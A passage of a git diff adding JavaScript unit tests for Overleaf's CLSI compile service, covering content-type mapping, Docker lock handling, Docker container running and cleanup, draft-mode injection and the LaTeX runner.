describe('image files', function () { + it('should map .png to image/png', function () { + const contentType = this.ContentTypeMapper.map('example.png') + return contentType.should.equal('image/png') + }) + + it('should map .jpeg to image/jpeg', function () { + const contentType = this.ContentTypeMapper.map('example.jpeg') + return contentType.should.equal('image/jpeg') + }) + + return it('should map .svg to text/plain to protect against XSS (SVG can execute JS)', function () { + const contentType = this.ContentTypeMapper.map('example.svg') + return contentType.should.equal('text/plain') + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/DockerLockManagerTests.js b/services/clsi/test/unit/js/DockerLockManagerTests.js new file mode 100644 index 0000000..f691794 --- /dev/null +++ b/services/clsi/test/unit/js/DockerLockManagerTests.js @@ -0,0 +1,246 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
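+// Note: the tests below exercise runWithLock — callers sharing a key are serialised (see the lock-contention cases), while distinct keys proceed concurrently; the setTimeout delays are illustrative timings only.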
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/DockerLockManager' +) + +describe('DockerLockManager', function () { + beforeEach(function () { + return (this.LockManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.Settings = { clsi: { docker: {} } }), + }, + })) + }) + + return describe('runWithLock', function () { + describe('with a single lock', function () { + beforeEach(function (done) { + this.callback = sinon.stub() + return this.LockManager.runWithLock( + 'lock-one', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world'), 100), + + (err, ...args) => { + this.callback(err, ...Array.from(args)) + return done() + } + ) + }) + + return it('should call the callback', function () { + return this.callback + .calledWith(null, 'hello', 'world') + .should.equal(true) + }) + }) + + describe('with two locks', function () { + beforeEach(function (done) { + this.callback1 = sinon.stub() + this.callback2 = sinon.stub() + this.LockManager.runWithLock( + 'lock-one', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world', 'one'), 100), + + (err, ...args) => { + return this.callback1(err, ...Array.from(args)) + } + ) + return this.LockManager.runWithLock( + 'lock-two', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world', 'two'), 200), + + (err, ...args) => { + this.callback2(err, ...Array.from(args)) + return done() + } + ) + }) + + it('should call the first callback', function () { + return this.callback1 + .calledWith(null, 'hello', 'world', 'one') + .should.equal(true) + }) + + return it('should call the second callback', function () { + return this.callback2 + .calledWith(null, 'hello', 'world', 'two') + .should.equal(true) + }) + }) + + return describe('with lock contention', function () { + describe('where the first lock is released quickly', function () { + beforeEach(function (done) { + this.LockManager.MAX_LOCK_WAIT_TIME = 1000 + this.LockManager.LOCK_TEST_INTERVAL = 100 + this.callback1 = sinon.stub() + this.callback2 = sinon.stub() + this.LockManager.runWithLock( + 'lock', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world', 'one'), 100), + + (err, ...args) => { + return this.callback1(err, ...Array.from(args)) + } + ) + return this.LockManager.runWithLock( + 'lock', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world', 'two'), 200), + + (err, ...args) => { + this.callback2(err, ...Array.from(args)) + return done() + } + ) + }) + + it('should call the first callback', function () { + return this.callback1 + .calledWith(null, 'hello', 'world', 'one') + .should.equal(true) + }) + + return it('should call the second callback', function () { + return this.callback2 + .calledWith(null, 'hello', 'world', 'two') + .should.equal(true) + }) + }) + + describe('where the first lock is held longer than the waiting time', function () { + beforeEach(function (done) { + let doneTwo + this.LockManager.MAX_LOCK_HOLD_TIME = 10000 + this.LockManager.MAX_LOCK_WAIT_TIME = 1000 + this.LockManager.LOCK_TEST_INTERVAL = 100 + this.callback1 = sinon.stub() + this.callback2 = sinon.stub() + let doneOne = (doneTwo = false) + const 
finish = function (key) { + if (key === 1) { + doneOne = true + } + if (key === 2) { + doneTwo = true + } + if (doneOne && doneTwo) { + return done() + } + } + this.LockManager.runWithLock( + 'lock', + releaseLock => + setTimeout( + () => releaseLock(null, 'hello', 'world', 'one'), + 1100 + ), + + (err, ...args) => { + this.callback1(err, ...Array.from(args)) + return finish(1) + } + ) + return this.LockManager.runWithLock( + 'lock', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world', 'two'), 100), + + (err, ...args) => { + this.callback2(err, ...Array.from(args)) + return finish(2) + } + ) + }) + + it('should call the first callback', function () { + return this.callback1 + .calledWith(null, 'hello', 'world', 'one') + .should.equal(true) + }) + + return it('should call the second callback with an error', function () { + const error = sinon.match.instanceOf(Error) + return this.callback2.calledWith(error).should.equal(true) + }) + }) + + return describe('where the first lock is held longer than the max holding time', function () { + beforeEach(function (done) { + let doneTwo + this.LockManager.MAX_LOCK_HOLD_TIME = 1000 + this.LockManager.MAX_LOCK_WAIT_TIME = 2000 + this.LockManager.LOCK_TEST_INTERVAL = 100 + this.callback1 = sinon.stub() + this.callback2 = sinon.stub() + let doneOne = (doneTwo = false) + const finish = function (key) { + if (key === 1) { + doneOne = true + } + if (key === 2) { + doneTwo = true + } + if (doneOne && doneTwo) { + return done() + } + } + this.LockManager.runWithLock( + 'lock', + releaseLock => + setTimeout( + () => releaseLock(null, 'hello', 'world', 'one'), + 1500 + ), + + (err, ...args) => { + this.callback1(err, ...Array.from(args)) + return finish(1) + } + ) + return this.LockManager.runWithLock( + 'lock', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world', 'two'), 100), + + (err, ...args) => { + this.callback2(err, ...Array.from(args)) + return finish(2) + } + ) + }) + + it('should call the first callback', function () { + return this.callback1 + .calledWith(null, 'hello', 'world', 'one') + .should.equal(true) + }) + + return it('should call the second callback', function () { + return this.callback2 + .calledWith(null, 'hello', 'world', 'two') + .should.equal(true) + }) + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/DockerRunnerTests.js b/services/clsi/test/unit/js/DockerRunnerTests.js new file mode 100644 index 0000000..d70aab5 --- /dev/null +++ b/services/clsi/test/unit/js/DockerRunnerTests.js @@ -0,0 +1,981 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
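+// Note: this suite stubs dockerode entirely; among other things it checks that local compile/output paths are rewritten to the host bind-mount paths configured via sandboxedCompilesHostDirCompiles and sandboxedCompilesHostDirOutput, with a read-only flag for the synctex/wordcount compile groups.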
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/DockerRunner' +) +const Path = require('node:path') + +describe('DockerRunner', function () { + beforeEach(function () { + let container, Docker, Timer + this.container = container = {} + this.DockerRunner = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.Settings = { + clsi: { docker: {} }, + path: {}, + }), + dockerode: (Docker = (function () { + Docker = class Docker { + static initClass() { + this.prototype.getContainer = sinon.stub().returns(container) + this.prototype.createContainer = sinon + .stub() + .yields(null, container) + this.prototype.listContainers = sinon.stub() + } + } + Docker.initClass() + return Docker + })()), + fs: (this.fs = { + stat: sinon.stub().yields(null, { + isDirectory() { + return true + }, + }), + }), + './Metrics': { + Timer: (Timer = class Timer { + done() {} + }), + }, + './LockManager': { + runWithLock(key, runner, callback) { + return runner(callback) + }, + }, + }, + globals: { Math }, // used by lodash + }) + this.Docker = Docker + this.getContainer = Docker.prototype.getContainer + this.createContainer = Docker.prototype.createContainer + this.listContainers = Docker.prototype.listContainers + + this.directory = '/local/compile/directory' + this.mainFile = 'main-file.tex' + this.compiler = 'pdflatex' + this.image = 'example.com/overleaf/image:2016.2' + this.env = {} + this.callback = sinon.stub() + this.project_id = 'project-id-123' + this.volumes = { '/some/host/dir/compiles/directory': '/compile' } + this.Settings.clsi.docker.image = this.defaultImage = 'default-image' + this.Settings.path.sandboxedCompilesHostDirCompiles = + '/some/host/dir/compiles' + this.Settings.path.sandboxedCompilesHostDirOutput = '/some/host/dir/output' + this.compileGroup = 'compile-group' + return (this.Settings.clsi.docker.env = { PATH: 'mock-path' }) + }) + + afterEach(function () { + this.DockerRunner.stopContainerMonitor() + }) + + describe('run', function () { + beforeEach(function (done) { + this.DockerRunner._getContainerOptions = sinon + .stub() + .returns((this.options = { mockoptions: 'foo' })) + this.DockerRunner._fingerprintContainer = sinon + .stub() + .returns((this.fingerprint = 'fingerprint')) + + this.name = `project-${this.project_id}-${this.fingerprint}` + + this.command = ['mock', 'command', '--outdir=$COMPILE_DIR'] + this.command_with_dir = ['mock', 'command', '--outdir=/compile'] + this.timeout = 42000 + return done() + }) + + describe('successfully', function () { + beforeEach(function (done) { + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + return this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + this.compileGroup, + (err, output) => { + this.callback(err, output) + return done() + } + ) + }) + + it('should generate the options for the container', function () { + return this.DockerRunner._getContainerOptions + .calledWith( 
+ this.command_with_dir, + this.image, + this.volumes, + this.timeout + ) + .should.equal(true) + }) + + it('should generate the fingerprint from the returned options', function () { + return this.DockerRunner._fingerprintContainer + .calledWith(this.options) + .should.equal(true) + }) + + it('should do the run', function () { + return this.DockerRunner._runAndWaitForContainer + .calledWith(this.options, this.volumes, this.timeout) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('standard compile', function () { + beforeEach(function () { + this.directory = '/var/lib/overleaf/data/compiles/xyz' + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + return this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + it('should re-write the bind directory', function () { + const volumes = + this.DockerRunner._runAndWaitForContainer.lastCall.args[1] + return expect(volumes).to.deep.equal({ + '/some/host/dir/compiles/xyz': '/compile', + }) + }) + + return it('should call the callback', function () { + return this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('synctex-output', function () { + beforeEach(function () { + this.directory = '/var/lib/overleaf/data/output/xyz/generated-files/id' + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + 'synctex-output', + this.callback + ) + }) + + it('should re-write the bind directory and set ro flag', function () { + const volumes = + this.DockerRunner._runAndWaitForContainer.lastCall.args[1] + expect(volumes).to.deep.equal({ + '/some/host/dir/output/xyz/generated-files/id': '/compile:ro', + }) + }) + + it('should call the callback', function () { + this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('synctex', function () { + beforeEach(function () { + this.directory = '/var/lib/overleaf/data/compile/xyz' + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + 'synctex', + this.callback + ) + }) + + it('should re-write the bind directory', function () { + const volumes = + this.DockerRunner._runAndWaitForContainer.lastCall.args[1] + expect(volumes).to.deep.equal({ + '/some/host/dir/compiles/xyz': '/compile:ro', + }) + }) + + it('should call the callback', function () { + this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('wordcount', function () { + beforeEach(function () { + this.directory = '/var/lib/overleaf/data/compile/xyz' + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + 'wordcount', + this.callback + ) + }) + + it('should re-write the bind directory', function () { + const volumes = + this.DockerRunner._runAndWaitForContainer.lastCall.args[1] + expect(volumes).to.deep.equal({ + 
'/some/host/dir/compiles/xyz': '/compile:ro', + }) + }) + + it('should call the callback', function () { + this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('when the run throws an error', function () { + beforeEach(function () { + let firstTime = true + this.output = 'mock-output' + this.DockerRunner._runAndWaitForContainer = ( + options, + volumes, + timeout, + callback + ) => { + if (callback == null) { + callback = function () {} + } + if (firstTime) { + firstTime = false + const error = new Error('(HTTP code 500) server error - ...') + error.statusCode = 500 + return callback(error) + } else { + return callback(null, this.output) + } + } + sinon.spy(this.DockerRunner, '_runAndWaitForContainer') + this.DockerRunner.destroyContainer = sinon.stub().callsArg(3) + return this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + it('should do the run twice', function () { + return this.DockerRunner._runAndWaitForContainer.calledTwice.should.equal( + true + ) + }) + + it('should destroy the container in between', function () { + return this.DockerRunner.destroyContainer + .calledWith(this.name, null) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('with no image', function () { + beforeEach(function () { + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + return this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + null, + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + return it('should use the default image', function () { + return this.DockerRunner._getContainerOptions + .calledWith( + this.command_with_dir, + this.defaultImage, + this.volumes, + this.timeout + ) + .should.equal(true) + }) + }) + + describe('with image override', function () { + beforeEach(function () { + this.Settings.texliveImageNameOveride = 'overrideimage.com/something' + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + return this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + return it('should use the override and keep the tag', function () { + const image = this.DockerRunner._getContainerOptions.args[0][1] + return image.should.equal('overrideimage.com/something/image:2016.2') + }) + }) + + describe('with image restriction', function () { + beforeEach(function () { + this.Settings.clsi.docker.allowedImages = [ + 'repo/image:tag1', + 'repo/image:tag2', + ] + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + }) + + describe('with a valid image', function () { + beforeEach(function () { + this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + 'repo/image:tag1', + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + it('should setup the container', function () { + this.DockerRunner._getContainerOptions.called.should.equal(true) + }) + }) + + describe('with an invalid image', function () { + beforeEach(function () { + this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + 'something/different:evil', + this.timeout, +
this.env, + this.compileGroup, + this.callback + ) + }) + + it('should call the callback with an error', function () { + const err = new Error('image not allowed') + this.callback.called.should.equal(true) + this.callback.args[0][0].message.should.equal(err.message) + }) + + it('should not setup the container', function () { + this.DockerRunner._getContainerOptions.called.should.equal(false) + }) + }) + }) + }) + + describe('run with _getOptions', function () { + beforeEach(function (done) { + // this.DockerRunner._getContainerOptions = sinon + // .stub() + // .returns((this.options = { mockoptions: 'foo' })) + this.DockerRunner._fingerprintContainer = sinon + .stub() + .returns((this.fingerprint = 'fingerprint')) + + this.name = `project-${this.project_id}-${this.fingerprint}` + + this.command = ['mock', 'command', '--outdir=$COMPILE_DIR'] + this.command_with_dir = ['mock', 'command', '--outdir=/compile'] + this.timeout = 42000 + return done() + }) + + describe('when a compile group config is set', function () { + beforeEach(function () { + this.Settings.clsi.docker.compileGroupConfig = { + 'compile-group': { + 'HostConfig.newProperty': 'new-property', + }, + 'other-group': { otherProperty: 'other-property' }, + } + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + return this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + it('should set the docker options for the compile group', function () { + const options = + this.DockerRunner._runAndWaitForContainer.lastCall.args[0] + return expect(options.HostConfig).to.deep.include({ + Binds: ['/some/host/dir/compiles/directory:/compile:rw'], + LogConfig: { Type: 'none', Config: {} }, + CapDrop: 'ALL', + SecurityOpt: ['no-new-privileges'], + newProperty: 'new-property', + }) + }) + + return it('should call the callback', function () { + return this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + }) + + describe('_runAndWaitForContainer', function () { + beforeEach(function () { + this.options = { mockoptions: 'foo', name: (this.name = 'mock-name') } + this.DockerRunner.startContainer = ( + options, + volumes, + attachStreamHandler, + callback + ) => { + attachStreamHandler(null, (this.output = 'mock-output')) + return callback(null, (this.containerId = 'container-id')) + } + sinon.spy(this.DockerRunner, 'startContainer') + this.DockerRunner.waitForContainer = sinon + .stub() + .callsArgWith(2, null, (this.exitCode = 42)) + return this.DockerRunner._runAndWaitForContainer( + this.options, + this.volumes, + this.timeout, + this.callback + ) + }) + + it('should create/start the container', function () { + return this.DockerRunner.startContainer + .calledWith(this.options, this.volumes) + .should.equal(true) + }) + + it('should wait for the container to finish', function () { + return this.DockerRunner.waitForContainer + .calledWith(this.name, this.timeout) + .should.equal(true) + }) + + return it('should call the callback with the output', function () { + return this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('startContainer', function () { + beforeEach(function () { + this.attachStreamHandler = sinon.stub() + this.options = { mockoptions: 'foo', name: 'mock-name' } + this.container.inspect = sinon.stub().callsArgWith(0) + this.DockerRunner.attachToContainer = (
containerId, + attachStreamHandler, + cb + ) => { + attachStreamHandler() + return cb() + } + return sinon.spy(this.DockerRunner, 'attachToContainer') + }) + + describe('when the container exists', function () { + beforeEach(function () { + this.container.inspect = sinon.stub().callsArgWith(0) + this.container.start = sinon.stub().yields() + + return this.DockerRunner.startContainer( + this.options, + this.volumes, + () => {}, + this.callback + ) + }) + + it('should start the container with the given name', function () { + this.getContainer.calledWith(this.options.name).should.equal(true) + return this.container.start.called.should.equal(true) + }) + + it('should not try to create the container', function () { + return this.createContainer.called.should.equal(false) + }) + + it('should attach to the container', function () { + return this.DockerRunner.attachToContainer.called.should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should attach before the container starts', function () { + return sinon.assert.callOrder( + this.DockerRunner.attachToContainer, + this.container.start + ) + }) + }) + + describe('when the container does not exist', function () { + beforeEach(function () { + const exists = false + this.container.start = sinon.stub().yields() + this.container.inspect = sinon + .stub() + .callsArgWith(0, { statusCode: 404 }) + return this.DockerRunner.startContainer( + this.options, + this.volumes, + this.attachStreamHandler, + this.callback + ) + }) + + it('should create the container', function () { + return this.createContainer.calledWith(this.options).should.equal(true) + }) + + it('should call the callback and stream handler', function () { + this.attachStreamHandler.called.should.equal(true) + return this.callback.called.should.equal(true) + }) + + it('should attach to the container', function () { + return this.DockerRunner.attachToContainer.called.should.equal(true) + }) + + return it('should attach before the container starts', function () { + return sinon.assert.callOrder( + this.DockerRunner.attachToContainer, + this.container.start + ) + }) + }) + + describe('when the container is already running', function () { + beforeEach(function () { + const error = new Error( + `HTTP code is 304 which indicates error: server error - start: Cannot start container ${this.name}: The container MOCKID is already running.` + ) + error.statusCode = 304 + this.container.start = sinon.stub().yields(error) + this.container.inspect = sinon.stub().callsArgWith(0) + return this.DockerRunner.startContainer( + this.options, + this.volumes, + this.attachStreamHandler, + this.callback + ) + }) + + it('should not try to create the container', function () { + return this.createContainer.called.should.equal(false) + }) + + return it('should call the callback and stream handler without an error', function () { + this.attachStreamHandler.called.should.equal(true) + return this.callback.called.should.equal(true) + }) + }) + + return describe('when the container tries to be created, but already has been (race condition)', function () {}) + }) + + describe('waitForContainer', function () { + beforeEach(function () { + this.containerId = 'container-id' + this.timeout = 5000 + this.container.wait = sinon + .stub() + .yields(null, { StatusCode: (this.statusCode = 42) }) + return (this.container.kill = sinon.stub().yields()) + }) + + describe('when the container returns in time', function () { + beforeEach(function () { + 
return this.DockerRunner.waitForContainer( + this.containerId, + this.timeout, + this.callback + ) + }) + + it('should wait for the container', function () { + this.getContainer.calledWith(this.containerId).should.equal(true) + return this.container.wait.called.should.equal(true) + }) + + return it('should call the callback with the exit', function () { + return this.callback + .calledWith(null, this.statusCode) + .should.equal(true) + }) + }) + + return describe('when the container does not return before the timeout', function () { + beforeEach(function (done) { + this.container.wait = function (callback) { + if (callback == null) { + callback = function () {} + } + return setTimeout(() => callback(null, { StatusCode: 42 }), 100) + } + this.timeout = 5 + return this.DockerRunner.waitForContainer( + this.containerId, + this.timeout, + (...args) => { + this.callback(...Array.from(args || [])) + return done() + } + ) + }) + + it('should call kill on the container', function () { + this.getContainer.calledWith(this.containerId).should.equal(true) + return this.container.kill.called.should.equal(true) + }) + + it('should call the callback with an error', function () { + this.callback.calledWith(sinon.match(Error)).should.equal(true) + + const errorObj = this.callback.args[0][0] + expect(errorObj.message).to.include('container timed out') + expect(errorObj.timedout).equal(true) + }) + }) + }) + + describe('destroyOldContainers', function () { + beforeEach(function (done) { + const oneHourInSeconds = 60 * 60 + const oneHourInMilliseconds = oneHourInSeconds * 1000 + const nowInSeconds = Date.now() / 1000 + this.containers = [ + { + Name: '/project-old-container-name', + Id: 'old-container-id', + Created: nowInSeconds - oneHourInSeconds - 100, + }, + { + Name: '/project-new-container-name', + Id: 'new-container-id', + Created: nowInSeconds - oneHourInSeconds + 100, + }, + { + Name: '/totally-not-a-project-container', + Id: 'some-random-id', + Created: nowInSeconds - 2 * oneHourInSeconds, + }, + ] + this.DockerRunner.MAX_CONTAINER_AGE = oneHourInMilliseconds + this.listContainers.callsArgWith(1, null, this.containers) + this.DockerRunner.destroyContainer = sinon.stub().callsArg(3) + return this.DockerRunner.destroyOldContainers(error => { + this.callback(error) + return done() + }) + }) + + it('should list all containers', function () { + return this.listContainers.calledWith({ all: true }).should.equal(true) + }) + + it('should destroy old containers', function () { + this.DockerRunner.destroyContainer.callCount.should.equal(1) + return this.DockerRunner.destroyContainer + .calledWith('project-old-container-name', 'old-container-id') + .should.equal(true) + }) + + it('should not destroy new containers', function () { + return this.DockerRunner.destroyContainer + .calledWith('project-new-container-name', 'new-container-id') + .should.equal(false) + }) + + it('should not destroy non-project containers', function () { + return this.DockerRunner.destroyContainer + .calledWith('totally-not-a-project-container', 'some-random-id') + .should.equal(false) + }) + + return it('should callback the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + describe('_destroyContainer', function () { + beforeEach(function () { + this.containerId = 'some_id' + this.fakeContainer = { remove: sinon.stub().callsArgWith(1, null) } + return (this.Docker.prototype.getContainer = sinon + .stub() + .returns(this.fakeContainer)) + }) + + it('should get the container', function (done) { + 
return this.DockerRunner._destroyContainer( + this.containerId, + false, + err => { + if (err) return done(err) + this.Docker.prototype.getContainer.callCount.should.equal(1) + this.Docker.prototype.getContainer + .calledWith(this.containerId) + .should.equal(true) + return done() + } + ) + }) + + it('should try to force-destroy the container when shouldForce=true', function (done) { + return this.DockerRunner._destroyContainer( + this.containerId, + true, + err => { + if (err) return done(err) + this.fakeContainer.remove.callCount.should.equal(1) + this.fakeContainer.remove + .calledWith({ force: true, v: true }) + .should.equal(true) + return done() + } + ) + }) + + it('should not try to force-destroy the container when shouldForce=false', function (done) { + return this.DockerRunner._destroyContainer( + this.containerId, + false, + err => { + if (err) return done(err) + this.fakeContainer.remove.callCount.should.equal(1) + this.fakeContainer.remove + .calledWith({ force: false, v: true }) + .should.equal(true) + return done() + } + ) + }) + + it('should not produce an error', function (done) { + return this.DockerRunner._destroyContainer( + this.containerId, + false, + err => { + expect(err).to.equal(null) + return done() + } + ) + }) + + describe('when the container is already gone', function () { + beforeEach(function () { + this.fakeError = new Error('woops') + this.fakeError.statusCode = 404 + this.fakeContainer = { + remove: sinon.stub().callsArgWith(1, this.fakeError), + } + return (this.Docker.prototype.getContainer = sinon + .stub() + .returns(this.fakeContainer)) + }) + + return it('should not produce an error', function (done) { + return this.DockerRunner._destroyContainer( + this.containerId, + false, + err => { + expect(err).to.equal(null) + return done() + } + ) + }) + }) + + return describe('when container.destroy produces an error', function (done) { + beforeEach(function () { + this.fakeError = new Error('woops') + this.fakeError.statusCode = 500 + this.fakeContainer = { + remove: sinon.stub().callsArgWith(1, this.fakeError), + } + return (this.Docker.prototype.getContainer = sinon + .stub() + .returns(this.fakeContainer)) + }) + + return it('should produce an error', function (done) { + return this.DockerRunner._destroyContainer( + this.containerId, + false, + err => { + expect(err).to.not.equal(null) + expect(err).to.equal(this.fakeError) + return done() + } + ) + }) + }) + }) + + return describe('kill', function () { + beforeEach(function () { + this.containerId = 'some_id' + this.fakeContainer = { kill: sinon.stub().callsArgWith(0, null) } + return (this.Docker.prototype.getContainer = sinon + .stub() + .returns(this.fakeContainer)) + }) + + it('should get the container', function (done) { + return this.DockerRunner.kill(this.containerId, err => { + if (err) return done(err) + this.Docker.prototype.getContainer.callCount.should.equal(1) + this.Docker.prototype.getContainer + .calledWith(this.containerId) + .should.equal(true) + return done() + }) + }) + + it('should try to force-destroy the container', function (done) { + return this.DockerRunner.kill(this.containerId, err => { + if (err) return done(err) + this.fakeContainer.kill.callCount.should.equal(1) + return done() + }) + }) + + it('should not produce an error', function (done) { + return this.DockerRunner.kill(this.containerId, err => { + expect(err).to.equal(undefined) + return done() + }) + }) + + describe('when the container is not actually running', function () { + beforeEach(function () { + 
this.fakeError = new Error('woops') + this.fakeError.statusCode = 500 + this.fakeError.message = + 'Cannot kill container <whatever> is not running' + this.fakeContainer = { + kill: sinon.stub().callsArgWith(0, this.fakeError), + } + return (this.Docker.prototype.getContainer = sinon + .stub() + .returns(this.fakeContainer)) + }) + + return it('should not produce an error', function (done) { + return this.DockerRunner.kill(this.containerId, err => { + expect(err).to.equal(undefined) + return done() + }) + }) + }) + + return describe('when container.kill produces a legitimate error', function (done) { + beforeEach(function () { + this.fakeError = new Error('woops') + this.fakeError.statusCode = 500 + this.fakeError.message = 'Totally legitimate reason to throw an error' + this.fakeContainer = { + kill: sinon.stub().callsArgWith(0, this.fakeError), + } + return (this.Docker.prototype.getContainer = sinon + .stub() + .returns(this.fakeContainer)) + }) + + return it('should produce an error', function (done) { + return this.DockerRunner.kill(this.containerId, err => { + expect(err).to.not.equal(undefined) + expect(err).to.equal(this.fakeError) + return done() + }) + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/DraftModeManagerTests.js b/services/clsi/test/unit/js/DraftModeManagerTests.js new file mode 100644 index 0000000..eda8338 --- /dev/null +++ b/services/clsi/test/unit/js/DraftModeManagerTests.js @@ -0,0 +1,44 @@ +const Path = require('node:path') +const fsPromises = require('node:fs/promises') +const { expect } = require('chai') +const mockFs = require('mock-fs') +const SandboxedModule = require('sandboxed-module') + +const MODULE_PATH = Path.join(__dirname, '../../../app/js/DraftModeManager') + +describe('DraftModeManager', function () { + beforeEach(function () { + this.DraftModeManager = SandboxedModule.require(MODULE_PATH, { + requires: { + 'fs/promises': fsPromises, + }, + }) + this.filename = '/mock/filename.tex' + this.contents = `\ +\\documentclass{article} +\\begin{document} +Hello world +\\end{document}\ +` + mockFs({ + [this.filename]: this.contents, + }) + }) + + afterEach(function () { + mockFs.restore() + }) + + describe('injectDraftMode', function () { + it('prepends a special command to the beginning of the file', async function () { + await this.DraftModeManager.promises.injectDraftMode(this.filename) + const contents = await fsPromises.readFile(this.filename, { + encoding: 'utf8', + }) + expect(contents).to.equal( + '\\PassOptionsToPackage{draft}{graphicx}\\PassOptionsToPackage{draft}{graphics}' + + this.contents + ) + }) + }) +}) diff --git a/services/clsi/test/unit/js/LatexRunnerTests.js b/services/clsi/test/unit/js/LatexRunnerTests.js new file mode 100644 index 0000000..0d250dd --- /dev/null +++ b/services/clsi/test/unit/js/LatexRunnerTests.js @@ -0,0 +1,219 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') + +const MODULE_PATH = require('node:path').join( + __dirname, + '../../../app/js/LatexRunner' +) + +describe('LatexRunner', function () { + beforeEach(function () { + this.Settings = { + docker: { + socketPath: '/var/run/docker.sock', + }, + } + this.commandRunnerOutput = { + stdout: 'this is stdout', + stderr: 'this is stderr', + } + this.CommandRunner = { + run: sinon.stub().yields(null, this.commandRunnerOutput), + } + this.fs = { + writeFile: sinon.stub().yields(), + unlink: sinon + .stub() + .yields(new Error('ENOENT: no such file or directory, unlink ...')), + } + 
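    // fs is stubbed so the tests can assert the stdout/stderr bookkeeping (writes to output.stdout/output.stderr) without disk I/O; the ENOENT from unlink mimics the usual case where no stale output files exist. +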
this.LatexRunner = SandboxedModule.require(MODULE_PATH, { + requires: { + '@overleaf/settings': this.Settings, + './CommandRunner': this.CommandRunner, + fs: this.fs, + }, + }) + + this.directory = '/local/compile/directory' + this.mainFile = 'main-file.tex' + this.compiler = 'pdflatex' + this.image = 'example.com/image' + this.compileGroup = 'compile-group' + this.callback = sinon.stub() + this.project_id = 'project-id-123' + this.env = { foo: '123' } + this.timeout = 42000 + this.flags = [] + this.stopOnFirstError = false + this.stats = {} + this.timings = {} + + this.call = function (callback) { + this.LatexRunner.runLatex( + this.project_id, + { + directory: this.directory, + mainFile: this.mainFile, + compiler: this.compiler, + timeout: this.timeout, + image: this.image, + environment: this.env, + compileGroup: this.compileGroup, + flags: this.flags, + stopOnFirstError: this.stopOnFirstError, + timings: this.timings, + stats: this.stats, + }, + callback + ) + } + }) + + describe('runLatex', function () { + describe('normally', function () { + beforeEach(function (done) { + this.call(done) + }) + + it('should run the latex command', function () { + 